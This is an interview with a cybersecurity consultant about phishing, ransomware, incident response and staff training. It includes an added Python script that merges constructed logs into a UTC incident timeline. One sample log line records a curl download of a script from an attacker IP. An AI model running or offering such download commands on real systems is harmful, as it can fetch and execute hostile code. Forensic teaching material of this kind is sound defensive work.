Ask the Experts:
Simon Rosemeyer, NexGen Cyber
In an era where technology plays a crucial role in our lives and businesses, cybersecurity has become a top priority. To shed light on the importance of IT security and the challenges faced by organisations today, we sat down with Simon Rosemeyer, a cybersecurity expert and the founder of NexGen Cyber, an IT security consultancy. In this interview, Simon shares his insights on the current cybersecurity landscape, emerging trends and threats, and the steps businesses can take to mitigate risks and safeguard their digital assets.
What initially drew you towards a career in cybersecurity?
Throughout my 35 years of experience in the industry, I have witnessed significant technological advancements over the decades. However, one glaring issue became apparent: while technology progressed rapidly, we failed to keep pace with security measures. As a result, we now face the challenge of bridging the gap between rapidly advancing technologies and the need for robust security.
In recent times, the situation has become even more complex. The COVID-19 pandemic forced organisations to adopt remote work models, which further dispersed the workforce. This introduced a whole new set of security concerns, as we had to secure home devices, mobile devices (both business and personal), and address the vulnerabilities brought by IoT devices. It has become a relentless challenge to ensure the security of these diverse environments.
Recognising the urgency to bring security up to date, I embarked on a journey into the world of cybersecurity eight years ago. I understood that security needed to catch up with the rapid technological advancements we were witnessing. My motivation was to contribute my expertise and knowledge to help organisations navigate this ever-changing cyber landscape and safeguard their critical assets.
As we embrace the opportunities and innovations brought by modern technologies, it is crucial to prioritise security at every step. By staying abreast of the latest security trends, emerging threats, and industry best practices, we strive to bridge the gap between technology and security. Our aim is to help organisations develop robust security strategies, implement effective controls, and build a culture of cybersecurity resilience.
The challenges we face today are vast, encompassing a diverse range of technologies, remote work models, and evolving threat landscapes. By continuously adapting and growing in the field of cybersecurity, we are committed to contributing our experience and expertise to tackle these challenges head-on, ensuring that organisations can leverage technology securely and protect their valuable assets.
What are the most common cyber threats that organisations face today, and how do you keep up with new threats as they emerge?
Organisations today face a wide range of cyber threats, and it's important to stay vigilant and proactive in defending against threat actors. But two of the most common cyber threats that organisations face are:
Phishing Attacks (Business Email Compromise): Phishing is a method used by threat actors to trick individuals into sharing sensitive information such as passwords, credit card numbers, or personal data. These attacks often come in the form of deceptive emails, websites, or messages and are one of the most significant threats to organisations today.
Ransomware: Ransomware is a type of malware that encrypts a victim’s files and demands a ransom in exchange for restoring access to the data. It can spread through malicious email attachments, infected websites, or compromised networks.
What is the biggest cyber security challenge that you face?
One of the most significant challenges in cybersecurity is the need to instil a serious mindset towards security within organisations. It involves overcoming obstacles such as organisations underestimating the importance of cybersecurity, convincing them to allocate appropriate budgets for security measures, and witnessing situations where organisations fail to act on recommended security practices only to face a breach and then seek assistance.
In the realm of cybersecurity, the primary challenge lies in raising awareness and convincing organisations to prioritise security as a critical aspect of their operations. It requires overcoming complacency and promoting a proactive approach to protect valuable assets and sensitive information.
Another major hurdle is securing adequate budgets for cybersecurity initiatives. Many organisations struggle to allocate sufficient resources to address evolving threats and implement robust security measures. Convincing decision-makers to invest in cybersecurity, despite competing priorities, can be a daunting task.
Additionally, there are instances where security professionals provide recommendations and guidance to organisations, only to witness those organisations ignore the advice. It becomes disheartening to see those organisations fall victim to breaches or cyber incidents and then seek assistance retrospectively.
Addressing these challenges requires a multi-faceted approach. Ultimately, the goal is a culture of security awareness, where organisations consistently prioritise cybersecurity, allocate appropriate budgets, and act upon the recommendations provided by security professionals to mitigate risks effectively.
How do you balance the security needs of an organisation and the need for productivity and usability by employees and customers?
Striking the right balance between security, productivity, and usability is an ongoing process that requires continuous evaluation, adaptation, and collaboration across the organisation.
Adopt a risk-based approach to security, where the level of security measures and controls is commensurate with the identified risks. Conduct a thorough risk assessment to understand the potential threats, vulnerabilities, and impact to the organisation. This allows you to prioritise security measures based on the level of risk they address.
With the rise of remote work, establish secure remote access solutions that enable employees to work efficiently while maintaining security. Implement Virtual Private Networks (VPNs), secure cloud-based collaboration tools, and endpoint security measures to protect data and systems accessed remotely. Consider multi-factor authentication (MFA) options that provide an additional layer of security without significantly impeding productivity.
It is also important to involve employees and customers in the security process by promoting awareness, education, and engagement. Communicate the importance of security practices and their impact on productivity and usability.
Lastly, encourage feedback and suggestions on security measures, seeking input on usability concerns or potential enhancements. This collaborative approach helps ensure that security measures are aligned with the needs of the organisation.
Can you walk us through a process you would take to investigate a potential security breach or incident?
Investigating a potential security breach or incident requires a systematic and thorough approach to identify the root cause, assess the impact, and take appropriate remedial actions.
A general process that can be followed:
Preparation:
a. Assemble an Incident Response Team: Form a team of individuals with relevant expertise, including cybersecurity professionals, IT personnel, legal advisors, and communication specialists. Assign specific roles and responsibilities to team members.
b. Establish an Incident Response Plan: Have a well-defined and documented incident response plan in place that outlines the steps to be taken during a security incident. Ensure that the plan is regularly reviewed and updated to reflect changes in the threat landscape and the organisation’s infrastructure.
Identification and Notification:
a. Detection: Detect the potential security breach or incident through various sources, such as security monitoring systems, alerts from security tools, employee reports, or customer complaints.
b. Initial Assessment: Gather preliminary information about the incident, including the nature of the incident, affected systems, and potential impact.
c. Notification: Inform the necessary stakeholders, such as the Incident Response Team, senior management, legal department, and relevant regulatory authorities, as required by applicable regulations.
Containment:
a. Isolate Affected Systems: Take immediate action to isolate the affected systems or network segments to prevent further damage and limit the scope of the incident.
b. Preserve Evidence: Implement measures to preserve the integrity of potential evidence for forensic analysis. This may involve taking system snapshots, capturing network traffic, or creating disk images.
Investigation and Analysis:
a. Forensic Analysis: Conduct a detailed forensic analysis to determine the cause of the incident, the extent of the compromise, and the potential impact on data and systems. Collect and analyse relevant logs, artifacts, and other digital evidence.
b. Root Cause Analysis: Identify the root cause of the incident by examining the attack vectors, vulnerabilities, or human errors that led to the breach. Determine if it was an external attack, insider threat, or a combination of factors.
c. Timeline Reconstruction: Develop a timeline of events leading up to and during the incident to understand the sequence of activities and aid in the investigation.
d. Attribution (if applicable): Attempt to attribute the incident to specific threat actors or groups if feasible and relevant to the organisation’s context.
Mitigation and Recovery:
a. Remediation: Develop a plan to mitigate the identified vulnerabilities or weaknesses that allowed the incident to occur. This may involve applying patches, updating configurations, enhancing security controls, or implementing compensating controls.
b. Data Restoration: Restore affected systems and data from clean backups, ensuring the removal of any malicious presence.
c. System Hardening: Strengthen the security posture of the organisation’s systems and network infrastructure to prevent similar incidents in the future. This may include implementing security best practices, conducting security awareness training, and enhancing access controls.
Reporting and Documentation:
a. Incident Report: Prepare a comprehensive incident report documenting the details of the incident, the investigation findings, the actions taken for containment and recovery, and recommendations to prevent future incidents.
b. Lessons Learned: Conduct a post-incident review with the Incident Response Team to identify areas for improvement in incident response processes, security controls, and employee training.
Post-Incident Activities:
a. Continuous Monitoring: Implement measures to monitor the network and systems continuously for any signs of recurring or new security incidents. Update security controls and response plans based on the lessons learned.
b. Communication: Communicate with relevant stakeholders, including employees, customers, partners, and regulatory authorities, about the incident, the actions taken, and any necessary steps they need to follow.
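The Timeline Reconstruction step of the process above, worked through as an added example that is not part of the interview and not NexGen Cyber's own tooling: logs from different systems rarely share a timestamp format or time zone, so before events can be ordered they have to be normalised to one clock. The script below merges three constructed log sources (a syslog-style sshd/sudo log that carries no year or offset, an Apache-style access log whose stamp carries its own offset, and an ISO 8601 application log in a +01:00 zone) into a single UTC-ordered timeline and finds the first event involving an indicator. The host names, IP addresses, user name, timestamps, the syslog year and the syslog host's time zone are all assumptions made for the sample.

```python
"""Reconstruct an incident timeline from heterogeneous log sources.

Added example: normalises syslog, Common Log Format and ISO 8601 lines to
UTC and orders them, so that events from several hosts can be read as one
sequence. All sample data below is constructed.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Assumptions for the constructed sample: syslog lines carry neither a year
# nor a UTC offset, so both are supplied here; the access log is labelled
# with the host it came from.
SYSLOG_YEAR = 2024
SYSLOG_TZ = timezone.utc
ACCESS_SOURCE = "web01/access"

# Constructed sample lines (hosts, IPs, user and times are made up).
SYSLOG_LINES = [
    "Mar 14 09:02:11 web01 sshd[2213]: Failed password for admin from 203.0.113.7 port 51022 ssh2",
    "Mar 14 09:02:19 web01 sshd[2213]: Accepted password for admin from 203.0.113.7 port 51022 ssh2",
    "Mar 14 09:05:40 web01 sudo: admin : TTY=pts/0 ; COMMAND=/usr/bin/curl http://203.0.113.7/x.sh",
]
ACCESS_LOG_LINES = [
    '203.0.113.7 - - [14/Mar/2024:08:58:03 +0000] "GET /wp-login.php HTTP/1.1" 200 1532',
    '203.0.113.7 - - [14/Mar/2024:08:58:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]
APP_LOG_LINES = [
    '2024-03-14T10:10:02+01:00 level=warn msg="new cron entry written" user=admin',
]


@dataclass(order=True)
class Event:
    ts: datetime      # timezone-aware, normalised to UTC
    source: str
    message: str


SYSLOG_RE = re.compile(r"^(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) (.*)$")
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')
ISO_RE = re.compile(r"^(\S+) (.*)$")


def parse_syslog(line, year=SYSLOG_YEAR, tz=SYSLOG_TZ):
    """Parse 'Mon DD HH:MM:SS host msg'; year and offset must be supplied."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    stamp, host, msg = m.groups()
    local = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
    return Event(local.replace(tzinfo=tz).astimezone(timezone.utc), f"{host}/syslog", msg)


def parse_access(line, source=ACCESS_SOURCE):
    """Parse Common Log Format; the bracketed stamp carries its own offset."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    client, stamp, request, status = m.groups()
    ts = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    return Event(ts.astimezone(timezone.utc), source, f"{client} {request} -> {status}")


def parse_iso(line, source="app"):
    """Parse '<ISO 8601 stamp> message'; naive stamps are rejected, not guessed."""
    m = ISO_RE.match(line)
    if not m:
        return None
    stamp, msg = m.groups()
    try:
        ts = datetime.fromisoformat(stamp)
    except ValueError:
        return None
    if ts.tzinfo is None:
        return None
    return Event(ts.astimezone(timezone.utc), source, msg)


def build_timeline(syslog_lines, access_lines, app_lines):
    """Merge every source into one list ordered by UTC timestamp."""
    events = []
    for parser, lines in ((parse_syslog, syslog_lines),
                          (parse_access, access_lines),
                          (parse_iso, app_lines)):
        for line in lines:
            ev = parser(line)
            if ev is not None:
                events.append(ev)
    return sorted(events)


def first_contact(timeline, indicator):
    """Earliest event mentioning an indicator (IP, user, host), for scoping."""
    for ev in timeline:
        if indicator in ev.message:
            return ev
    return None


def render(timeline):
    """One line per event: UTC stamp, source, message."""
    return [f"{e.ts.strftime('%Y-%m-%dT%H:%M:%SZ')}  {e.source:<13} {e.message}"
            for e in timeline]


if __name__ == "__main__":
    tl = build_timeline(SYSLOG_LINES, ACCESS_LOG_LINES, APP_LOG_LINES)
    print("\n".join(render(tl)))
    fc = first_contact(tl, "203.0.113.7")
    print(f"\nfirst contact from 203.0.113.7: {fc.ts.isoformat()} ({fc.source})")
```

Run stand-alone, the script orders the web login probing at 08:58 UTC before the SSH logon at 09:02 UTC and the cron change at 09:10 UTC, even though the application log recorded the latter as 10:10 local time. The point of rejecting naive timestamps rather than guessing an offset is that a wrong assumption silently reorders events; in a real investigation the year and zone of each syslog host should be confirmed from the host itself before its lines are merged.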
If you could give one recommendation to make a business more secure what would it be?
If I could give one recommendation to make a business more secure, it would be to prioritise and invest in employee cybersecurity awareness and training.
Employees are often the first line of defence against cyber threats, and their actions can significantly impact an organisation’s security posture. By providing comprehensive cybersecurity awareness and training programs, businesses can empower their employees to recognise and respond to potential security risks effectively.
Keep employees updated on new attack techniques and emerging security best practices through regular training sessions, newsletters, or online resources.
By investing in employee cybersecurity awareness and training, organisations can build a strong security culture, foster responsible behaviour, and create a workforce that actively contributes to safeguarding the business from cyber threats. Remember, cybersecurity is a collective effort, and well-informed and vigilant employees play a crucial role in protecting assets and data; they become the organisation's human firewall.